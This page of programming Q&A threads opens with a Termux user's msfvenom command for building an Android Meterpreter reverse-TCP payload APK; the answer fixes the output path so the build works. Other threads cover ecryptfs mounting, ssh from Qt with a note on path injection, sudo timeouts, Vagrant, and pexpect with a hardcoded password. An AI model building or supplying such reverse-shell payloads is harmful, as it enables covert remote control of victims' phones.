A problem creating a Metasploit payload in Termux - termux

msfvenom -p android/meterpreter/reverse_tcp LHOST= ip LPORT=4444 R > /storage/hackmingtest.apk
bash: /storage/hackmingtest.apk: Permission denied
I use this command also (termux-setup-storage)
But it is not working

The solution to this question is very simple.
The /storage directory requires root access. I think the location you wanna enter is /storage/emulated/0/something.apk
Alternatively, you can also use /sdcard/whatever.apk
🖖🏻

Related

Mounting ecryptfs using C++ mount function

I am trying to mount ecryptfs from within a C++ program. I can definitely mount it without it asking questions by issuing this command at the prompt:
sudo mount -t ecryptfs -o "rw,key=passphrase:passphrase_passwd=geoff,ecryptfs_cipher=aes,ecryptfs_key_bytes=32,ecryptfs_passthrough=n,ecryptfs_enable_filename_crypto=n,no_sig_cache" ~/source/ ~/target/
Note that in reality, I am passing a full canonical path in case that matters.
But from within the program I get failure with errno=EINVAL after trying by using the mount() function with the same arguments:
mount("~/source/", "~/target/", "ecryptfs", MS_NODEV, "rw,key=passphrase:passphrase_passwd=geoff,ecryptfs_cipher=aes,ecryptfs_key_bytes=32,ecryptfs_passthrough=n,ecryptfs_enable_filename_crypto=n,no_sig_cache")
The program does launch with root privileges and I have checked that I have CAP_SYS_ADMIN.
The mount() function returns -1 and sets errno to EINVAL.
Have I got the arguments correct? Is this maybe a privileges issue?
EDIT: I got it to work by executing mount externally via system(), but would still like to use the function because of reasons.
I believe this is because mount -t ecryptfs is actually calling the helper executable mount.ecryptfs, and it's processing some of the options (in particular, key=) itself. What's actually passed to the kernel is different (you can see this by looking at /proc/mounts afterward).
If you look closely at https://manpages.ubuntu.com/manpages/kinetic/en/man7/ecryptfs.7.html, key= and ecryptfs_enable_filename_crypto= are listed under "MOUNT HELPER OPTIONS" - the actual kernel module's options are ecryptfs_sig=(fekek_sig) and ecryptfs_fnek_sig=(fnek_sig).
So, if you want to bypass the helper and do the mount directly, you'd need to load the tokens into the kernel's keyring with https://man7.org/linux/man-pages/man2/keyctl.2.html and replace key= with the resulting token signatures, like mount.ecryptfs did.
It does appear that there is a libecryptfs with functions in ecryptfs.h like ecryptfs_add_passphrase_key_to_keyring which you can (presumably, not tested) use to do this in a way matching the mount.ecryptfs

Ssh command from Qt

I have a problem with ssh in my Qt application. I need to run a command which removes a file on a remote server. I tried to use a QProcess class to achieve it. So I pass "ssh" as a name of command and necessary args. In common it looks like this:
QStringList params;
params.append(" user@" + ::host +
" \"rm /tmp/" + ::fileName + "\"");
d->impDelProcess->start("ssh", params);
But after all it keeps asking a password, though I generated ssh keys and copied a public key to the remote server. Moreover, when I run the command above in the terminal like this:
ssh user@host "rm /path/fileName"
it works perfectly. The file is deleted and no password is asked. So, the problem is somewhere in QProcess. Is there any way to get rid of asking for a password? Thank you!
Those are separate arguments, when you use string list. Try this:
params.append("user@" + ::host);
params.append("rm /tmp/" + ::fileName);
That will make Qt pass two arguments for ssh, the login string and the command to execute at remote host.
Important note! The above assumes ::filename does not contain spaces or anything else nasty! You can get around spaces with this:
params.append("rm '/tmp/" + ::fileName + "'");
But it won't help against wild cards or .. in path... Imagine if file name was ../home/user/* for example... So that is better be trusted input, or you need to sanitize it (but that is beyond scope of this answer).
What you do in the question code is to construct a single argument, equivalent to this shell command line:
ssh 'user@host "rm /path/filename"'
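The sanitising step that the answer above leaves out of scope, as an added example that is not part of the original answer: plain C++ (no Qt) that accepts only a bare file name and returns the two separate ssh arguments, one per QStringList entry. The function names are hypothetical, and user and host are assumed to be trusted values.

```cpp
#include <string>
#include <vector>

// Accept only a plain file name: non-empty, not starting with '-' or '.',
// and made of letters, digits, '.', '_' and '-' only. This rejects '/',
// spaces, quotes and shell wildcards, so "../home/user/*" cannot pass.
bool isSafeFileName(const std::string& name) {
    if (name.empty() || name.size() > 255) return false;
    if (name[0] == '-' || name[0] == '.') return false;
    for (unsigned char c : name) {
        bool ok = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                  (c >= '0' && c <= '9') || c == '.' || c == '_' || c == '-';
        if (!ok) return false;
    }
    return true;
}

// Quote a string for the remote POSIX shell: wrap it in single quotes and
// rewrite every embedded ' as '\''. Kept as a second layer behind the
// allow-list above.
std::string shellQuote(const std::string& s) {
    std::string out = "'";
    for (char c : s) {
        if (c == '\'') out += "'\\''";
        else out += c;
    }
    return out + "'";
}

// Returns the arguments that follow "ssh" (login string, then the remote
// command), or an empty vector when the file name is rejected.
// Assumption: user and host come from trusted configuration.
std::vector<std::string> buildSshRmArgs(const std::string& user,
                                        const std::string& host,
                                        const std::string& fileName) {
    if (!isSafeFileName(fileName)) return {};
    return {user + "@" + host,
            "rm -- " + shellQuote("/tmp/" + fileName)};
}
```

An empty result means the caller should not start the process at all.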

How to immediately forget last sudo usage

I am trying, in C++, to write a program that will request sudo privilege if it does not have it. I have accomplished that through execl("/usr/bin/sudo", "sudo", argv[0], (char *)NULL); but my biggest problem is occurring in trying to test it. Is there a way to make the system forget that I have recently used sudo so I can run and request access again?
sudo -k invalidates the credentials.
Edit:
There is sudo -K (capital K) command that you can invoke to invalidate the credentials, but the -k flag can be used by prepending it to argv (maybe even based on the build configuration)
Do the following steps to change the default timeout.
sudo visudo
scroll down and add the following line at the end:
Defaults:user_name timestamp_timeout=0
1) Change user_name to your actual user name.
2) Change 10 (in minutes) to anything you wish. A value of -1 will make it infinite (for a single session).
3) Hit Ctrl-X and then hit Y.
You are all set!

Manually specify location of .vagrant folder in Vagrantfile

The folder where I have Vagrantfile is being auto-generated during the build, so it gets cleaned up, but I'd like to still be able to use the created machines. The easiest way would be to put .vagrant folder somewhere outside the auto-generated folder. Is this possible?
You have (at least) two options:
Use VAGRANT_DOTFILE_PATH to set the location where the project specific data is stored (defaults to .vagrant as you already know). Note that the path has to be project/Vagrantfile specific.
cd to a directory where you want the .vagrant directory to be created, and use VAGRANT_VAGRANTFILE to specify the path to the generated Vagrantfile.
I know this is an old question, but for anyone arriving here via Google, there is a workaround if you really want to specify the metadata directory without mucking about with environment variables each time. Just put this in the top of your Vagrantfile:
VAGRANT_DOTFILE_PATH = 'custom/dotfile/path'
if(ENV['VAGRANT_DOTFILE_PATH'].nil? && '.vagrant' != VAGRANT_DOTFILE_PATH)
  puts 'changing metadata directory to ' + VAGRANT_DOTFILE_PATH
  ENV['VAGRANT_DOTFILE_PATH'] = VAGRANT_DOTFILE_PATH
  puts 'removing default metadata directory ' + FileUtils.rm_r('.vagrant').join("\n")
  system 'vagrant ' + ARGV.join(' ')
  ENV['VAGRANT_DOTFILE_PATH'] = nil #for good measure
  abort 'Finished'
end
I wanted each provider to use a separate Vagrant directory to easily be able to swap between them. I could not get @hairraisin's solution to work, but based on that I ended up with the following:
Vagrant.configure('2') do |config|
  config.vm.provider :lxd do |lxd, override|
    if ENV['VAGRANT_DOTFILE_PATH'].nil?
      ENV['VAGRANT_DOTFILE_PATH'] = '.vagrant-lxd'
      puts 'Removing default metadata directory ' + FileUtils.rm_r('.vagrant').join("\n")
      exec 'vagrant ' + ARGV.map{|arg| Shellwords.escape arg}.join(' ')
    end
…
This avoids endless recursion or aborting too early. exec rather than system avoids a non-zero exit code from every vagrant command.

Mkdir over SSH with Python does not work

I'm trying to create a new dir via SSH with a Python script. When I try my commands by using the Python command line it just works. But when I try to do the same by a script it does not create the new 'test' folder (I even copy/paste the commands in the script into the Python cmd to verify they are right and there they work). So any ideas why it does not work by script?
The used code:
child = pexpect.spawn('ssh 192.168.56.101 -oStrictHostKeyChecking=no')
child.expect=('password:')
child.sendline('MyPwd')
child.sendline('mkdir /home/myUser/Desktop/test')
Seems to work when I just add another line
for example
child.sendline('\n')
so the entire script is
child = pexpect.spawn('ssh 192.168.56.101 -oStrictHostKeyChecking=no')
child.expect=('password:')
child.sendline('MyPwd')
child.sendline('mkdir /home/myUser/Desktop/test')
child.sendline('\n')
What I usually do to solve this issue is sync-ing with host machine. After I send something to the machine, I expect an answer, which usually translates in the machine's prompt. So, in your case, I would go for something like this:
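import pexpect

child = pexpect.spawn('ssh 192.168.56.101 -oStrictHostKeyChecking=no')
child.expect('password:')   # wait for the password prompt
child.sendline('MyPwd')
child.expect('YourPromptHere')   # wait for the shell prompt after login
child.sendline('mkdir /home/myUser/Desktop/test')
child.expect('YourPromptHere')   # wait until mkdir has returned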
You can just replace YourPromptHere with the prompt of the machine, if you are running the script on a single target, or with a regular expression (eg. "(\$ )|(# )|(> )").
tl;dr: To summarize what I said, you need to wait until the previous action has finished before sending a new one.